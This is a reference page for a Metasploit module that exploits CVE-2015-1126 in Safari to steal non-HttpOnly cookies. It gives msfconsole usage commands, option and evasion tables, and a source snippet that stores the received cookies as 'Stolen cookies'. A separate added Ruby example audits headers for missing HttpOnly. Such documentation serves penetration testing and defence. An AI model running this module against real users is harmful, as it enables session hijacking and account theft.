Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft - Metasploit
This page contains detailed information about how to use the auxiliary/gather/apple_safari_ftp_url_cookie_theft Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft
Module: auxiliary/gather/apple_safari_ftp_url_cookie_theft
Source code: modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
Disclosure date: 2015-04-08
Last modification time: 2021-02-08 14:51:58 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-1126
A vulnerability exists in versions of OSX, iOS, and Windows Safari released before April 8, 2015 that allows the non-HTTPOnly cookies of any domain to be stolen.
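The description above limits the exposure to cookies set without the HttpOnly attribute. The following Ruby audit is an added example, not code from the module or the Metasploit project; the helper names (parse_set_cookie, exposed_cookies) and the sample headers are constructed for illustration. It lists which cookies in a set of Set-Cookie response headers fall into that exposed group.

```ruby
# Added example (not part of the Metasploit module): classify cookies by HttpOnly.
# Cookies sent without HttpOnly are the ones CVE-2015-1126 exposes on unpatched Safari.

# Parse one Set-Cookie header value into the cookie name and a hash of
# lowercased attribute names. Returns nil for a header with no name=value pair.
def parse_set_cookie(header)
  parts = header.split(';').map(&:strip).reject(&:empty?)
  return nil if parts.empty?

  name, sep, _value = parts.shift.partition('=')
  return nil if sep.empty? || name.strip.empty?

  attrs = {}
  parts.each do |attr|
    key, _, val = attr.partition('=')
    attrs[key.strip.downcase] = val.strip # attribute names are case-insensitive
  end
  { name: name.strip, attrs: attrs }
end

# Return the names of cookies that lack HttpOnly and are therefore in scope.
def exposed_cookies(set_cookie_headers)
  names = set_cookie_headers.map do |header|
    cookie = parse_set_cookie(header)
    next if cookie.nil? || cookie[:attrs].key?('httponly')

    cookie[:name]
  end
  names.compact.uniq
end

# Constructed sample headers, as an application under review might send them.
SAMPLE_HEADERS = [
  'sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'csrftoken=xyz; Path=/; Secure',
  'prefs=dark; Max-Age=3600; httponly',
  'auth_token=eyJ0; Domain=example.com; Path=/',
  'malformed-header-without-pair'
].freeze

if __FILE__ == $PROGRAM_NAME
  exposed_cookies(SAMPLE_HEADERS).each do |name|
    puts "#{name}: no HttpOnly attribute, in scope for this issue"
  end
end
```

Any session or authentication cookie this reports should be reissued with HttpOnly; values that page script must read, such as some CSRF tokens, stay in scope by design.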
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.
Basic Usage
msf > use auxiliary/gather/apple_safari_ftp_url_cookie_theft
msf auxiliary(apple_safari_ftp_url_cookie_theft) > show targets
... a list of targets ...
msf auxiliary(apple_safari_ftp_url_cookie_theft) > set TARGET target-id
msf auxiliary(apple_safari_ftp_url_cookie_theft) > show options
... show and set options ...
msf auxiliary(apple_safari_ftp_url_cookie_theft) > exploit
Msfconsole Usage
Here is how the gather/apple_safari_ftp_url_cookie_theft auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/apple_safari_ftp_url_cookie_theft
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show info
       Name: Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft
     Module: auxiliary/gather/apple_safari_ftp_url_cookie_theft
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-04-08
Provided by:
  Jouko Pynnonen
  joev
Available actions:
  Name       Description
  ----       -----------
  WebServer  Serve exploit via web server
Check supported:
  No
Basic options:
  Name            Current Setting        Required  Description
  ----            ---------------        --------  -----------
  HTTPPORT        8080                   yes       The HTTP server port
  PASVPORT        0                      no        The local PASV data port to listen on (0 is random)
  SRVHOST         0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT         5555                   yes       The local port to use for the FTP server
  SSL             false                  no        Negotiate SSL for incoming connections
  SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
  TARGET_DOMAINS  apple.com,example.com  yes       The comma-separated list of domains to steal non-HTTPOnly cookies from.
  URIPATH                                no        The URI to use for this exploit (default is random)
Description:
  A vulnerability exists in versions of OSX, iOS, and Windows Safari
  released before April 8, 2015 that allows the non-HTTPOnly cookies
  of any domain to be stolen.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-1126
  https://seclists.org/fulldisclosure/2015/Apr/30
Module Options
This is a complete list of options available in the gather/apple_safari_ftp_url_cookie_theft auxiliary module:
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show options
Module options (auxiliary/gather/apple_safari_ftp_url_cookie_theft):
  Name            Current Setting        Required  Description
  ----            ---------------        --------  -----------
  HTTPPORT        8080                   yes       The HTTP server port
  PASVPORT        0                      no        The local PASV data port to listen on (0 is random)
  SRVHOST         0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT         5555                   yes       The local port to use for the FTP server
  SSL             false                  no        Negotiate SSL for incoming connections
  SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
  TARGET_DOMAINS  apple.com,example.com  yes       The comma-separated list of domains to steal non-HTTPOnly cookies from.
  URIPATH                                no        The URI to use for this exploit (default is random)
Auxiliary action:
  Name       Description
  ----       -----------
  WebServer  Serve exploit via web server
Advanced Options
Here is a complete list of advanced options supported by the gather/apple_safari_ftp_url_cookie_theft auxiliary module:
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show advanced
Module advanced options (auxiliary/gather/apple_safari_ftp_url_cookie_theft):
  Name            Current Setting  Required  Description
  ----            ---------------  --------  -----------
  ListenerComm                     no        The specific communication channel to use for this service
  SSLCipher                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
  SSLCompression  false            no        Enable SSL/TLS-level compression
  VERBOSE         false            no        Enable detailed status messages
  WORKSPACE                        no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/apple_safari_ftp_url_cookie_theft module can do:
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show actions
Auxiliary actions:
  Name       Description
  ----       -----------
  WebServer  Serve exploit via web server
Evasion Options
Here is the full list of possible evasion options supported by the gather/apple_safari_ftp_url_cookie_theft auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show evasion
Module evasion options:
  Name                Current Setting  Required  Description
  ----                ---------------  --------  -----------
  TCP::max_send_size  0                no        Maximum tcp segment size. (0 = disable)
  TCP::send_delay     0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages. For each one, check the possible causes in the related code snippet from the module source code; this can often help in identifying the root cause of the problem.
zlib support was not detected, yet the HTTP::compression option was set. Don't do that!
Here is a relevant code snippet related to the "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" error message:
    # exception is only raised if the DisableGzip advanced option has not been
    # set.
    #
    def use_zlib
      unless Rex::Text.zlib_present? || !datastore['HTTP::compression']
        fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
      end
    end
<CLI.PEERHOST>: No cookies found for <DOMAIN>
Here is a relevant code snippet related to the "<CLI.PEERHOST>: No cookies found for <DOMAIN>" error message:
    if request.method.downcase == 'post'
      json = JSON.parse(request.body)
      domain = json['domain']
      cookie = Rex::Text.decode_base64(json['p']).to_s
      if cookie.length == 0
        print_error("#{cli.peerhost}: No cookies found for #{domain}")
      else
        file = store_loot(
          "cookie_#{domain}", 'text/plain', cli.peerhost, cookie, 'cookie', 'Stolen cookies'
        )
        print_good("#{cli.peerhost}: Cookies stolen for #{domain} (#{cookie.bytes.length} bytes): ")
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6644 Merged Pull Request: Preserve default types for datastore options
- #5312 Merged Pull Request: Various post-commit fixups
- #5192 Merged Pull Request: Add safari non-HTTPOnly cookie theft module
See Also
Check also the following modules related to this module:
- auxiliary/gather/apple_safari_webarchive_uxss
- auxiliary/admin/vxworks/apple_airport_extreme_password
- auxiliary/dos/apple_ios/webkit_backdrop_filter_blur
- exploit/apple_ios/browser/safari_jit
- exploit/apple_ios/browser/safari_libtiff
- exploit/apple_ios/browser/webkit_createthis
- exploit/apple_ios/browser/webkit_trident
- exploit/apple_ios/email/mobilemail_libtiff
- exploit/apple_ios/ssh/cydia_default_ssh
- exploit/windows/browser/apple_itunes_playlist
- exploit/windows/browser/apple_quicktime_marshaled_punk
- exploit/windows/browser/apple_quicktime_mime_type
- exploit/windows/browser/apple_quicktime_rdrf
- exploit/windows/browser/apple_quicktime_rtsp
- exploit/windows/browser/apple_quicktime_smil_debug
- exploit/windows/browser/apple_quicktime_texml_font_table
- exploit/windows/fileformat/apple_quicktime_pnsize
- exploit/windows/fileformat/apple_quicktime_rdrf
- exploit/windows/fileformat/apple_quicktime_texml
- exploit/windows/misc/apple_quicktime_rtsp_response
- payload/apple_ios/aarch64/meterpreter_reverse_http
- payload/apple_ios/aarch64/meterpreter_reverse_https
- payload/apple_ios/aarch64/meterpreter_reverse_tcp
- payload/apple_ios/aarch64/shell_reverse_tcp
- payload/apple_ios/armle/meterpreter_reverse_http
- payload/apple_ios/armle/meterpreter_reverse_https
- payload/apple_ios/armle/meterpreter_reverse_tcp
- post/apple_ios/gather/ios_image_gather
- post/apple_ios/gather/ios_text_gather
- post/multi/gather/apple_ios_backup
- auxiliary/admin/appletv/appletv_display_image
- auxiliary/admin/appletv/appletv_display_video
- auxiliary/scanner/http/appletv_login
Authors
- Jouko Pynnonen
- joev
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.